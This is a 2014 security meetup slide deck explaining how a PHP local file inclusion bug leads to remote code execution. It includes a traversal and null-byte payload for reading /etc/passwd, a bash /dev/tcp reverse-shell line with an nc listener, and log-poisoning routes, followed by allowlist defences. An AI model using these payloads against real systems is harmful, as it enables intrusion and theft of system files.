Local File Inclusion to Remote Code Execution

null0x00, 13 slides, Apr 07, 2014

About This Presentation

null Bangalore Chapter - March 2014 Meet



Local File Inclusion To Remote
Command Execution [LFI <> RCE]
By
Sharath Unni

Introduction
What is a file inclusion vulnerability?
How the attack works?
RFI/LFI vulnerable PHP functions
Traverse and read local files
Path Traversal / FI using scanners
Reverse shell via LFI
Other ways to inject your code
Defending yourself

What is a file inclusion vulnerability?
Input validation
  The application trusts/doesn't validate the user input

The code includes/imports other pages
  Dynamic including of the page
  When PHP includes a file it will parse any PHP code within that file ("<?php" and "?>")

Do not trust the user...ever !!

How the attack works?
http://192.168.109.136/dvwa/vulnerabilities/fi/?page=include

The code would be:

<?php $page = $_GET['page'];
include("/" . $page . ".php"); <-- Vulnerable !!
?>

Assign page to "../../../../etc/passwd%00"

<?php $page = $_GET['page'];
include("/../../../../etc/passwd%00.php"); <-- Directory Traversal to LFI
?>
(shown URL-encoded; by the time PHP reads $_GET the web server has already decoded %00 into a real NUL byte)

%00 (Null CHAR): PHP before 5.3.4 handed the path to the C library as a NUL-terminated string, so everything after the NUL (here the forced ".php" suffix) was ignored. PHP 5.3.4 and later refuse any path containing a NUL byte, so this suffix bypass only works on old installs.
../../../../ will traverse up to the root and then go to /etc/passwd (extra "../" at "/" are harmless, so over-shooting the depth is safe for the attacker)
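An added example (not from the slides) that models the vulnerable include("/" . $page . ".php") line in Python and shows how the traversal plus null-byte payload resolves under the two PHP behaviours described above. The parameter name and payload follow the slide; the 5.3.4 version boundary is PHP's documented NUL-byte check, and the path normalisation stands in for the kernel's "../" handling.

```python
import posixpath
from typing import Optional
from urllib.parse import unquote

NUL = "\x00"


def build_include_path(page_param: str) -> str:
    """Reproduce the slide's vulnerable line, include("/" . $page . ".php").

    page_param is the raw query-string value. The web server URL-decodes it
    before PHP sees $_GET, so "%00" becomes a real NUL byte and "%2e%2e%2f"
    becomes "../" here as well."""
    return "/" + unquote(page_param) + ".php"


def resolve_include(path: str, php_rejects_nul: bool) -> Optional[str]:
    """Return the file PHP would actually open, or None if the include is refused.

    php_rejects_nul=False models PHP < 5.3.4: the path reached the C library
    as a NUL-terminated string, so everything after \\x00 was silently dropped
    and the appended ".php" never mattered.
    php_rejects_nul=True models PHP 5.3.4 and later, which refuse a path that
    contains a NUL byte, so the classic %00 trick stops working there."""
    if NUL in path:
        if php_rejects_nul:
            return None
        path = path.split(NUL, 1)[0]
    # normpath collapses "../" segments the way the kernel walks them; at the
    # root, extra "../" are dropped, which is why over-shooting is harmless.
    return posixpath.normpath(path)


if __name__ == "__main__":
    payload = "../../../../etc/passwd%00"          # the slide's payload
    candidate = build_include_path(payload)
    print(repr(candidate))                          # '/../../../../etc/passwd\x00.php'
    print(resolve_include(candidate, php_rejects_nul=False))   # /etc/passwd
    print(resolve_include(candidate, php_rejects_nul=True))    # None
    # Without the NUL byte the forced ".php" suffix defeats the read:
    print(resolve_include(build_include_path("../../../../etc/passwd"), True))  # /etc/passwd.php
```

The last line is the point of the null byte: without it the concatenated suffix turns the target into /etc/passwd.php, which does not exist, so on a patched PHP the attacker needs a different vector (a file the application includes without adding a suffix, or the injection routes covered later in the deck).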

RFI/LFI vulnerable PHP functions

include()
include_once()
require()
require_once()
fopen()

Only the include/require family executes PHP code found in the target file; fopen() (like file_get_contents() and readfile()) only discloses its contents. Pulling a remote URL into include/require additionally needs allow_url_include=On, while the read-only functions are governed by allow_url_fopen.

Common locations
Normally, the following files are read:
/etc/passwd
/etc/group
/etc/security/passwd   (AIX)
/etc/security/user     (AIX)
/etc/security/environ  (AIX)
/etc/httpd/conf/httpd.conf

Other Unix common locations

Path Traversal / FI using scanners
http://sectooladdict.blogspot.in/ OR http://sectoolmarket.com/

We read the files, what next?

Reverse shell via LFI
PHP script to open an outbound TCP connection (plant it somewhere the vulnerable include can reach, then include that file):

<?php exec("bash -c 'bash -i >& /dev/tcp/<yourIP>/<port> 0>&1'"); ?>

exec() hands the command to /bin/sh; the >& redirection and /dev/tcp are bash features, so on systems where sh is dash the one-liner must be wrapped in bash -c as above.

Go and catch the reverse shell

nc -lvp <port>

Other ways to inject your code
Using directory traversal to read files
Log poisoning (access.log, error.log)
Session variables
Uploaded files
Emails
Shared hosting
FTP and other logs

Defending yourself
Map user input to an allowlist and never let the user-supplied string reach the filesystem path:

<?php
 $page_files = array(
  'about'   => 'about.html',
  'photos'  => 'photos.html',
  'contact' => 'contact.html',
  'home'    => 'home.html'
 );

 // Default to home when the parameter is missing; reject arrays (?page[]=x)
 // before the key lookup, and use a strict key check rather than in_array().
 $page = isset($_GET['page']) ? $_GET['page'] : 'home';
 if (is_string($page) && array_key_exists($page, $page_files)) {
  include $page_files[$page];
 } else {
  include $page_files['home'];
 }
?>

Back this up in php.ini: allow_url_include=Off (and allow_url_fopen=Off if nothing needs it) to close the RFI door, and open_basedir to confine which directories PHP may read at all.

Thank You! 

References
http://sectoolmarket.com/path-traversal-local-file-inclusion-detection-accuracy-of-open-source-web-application-scanners.html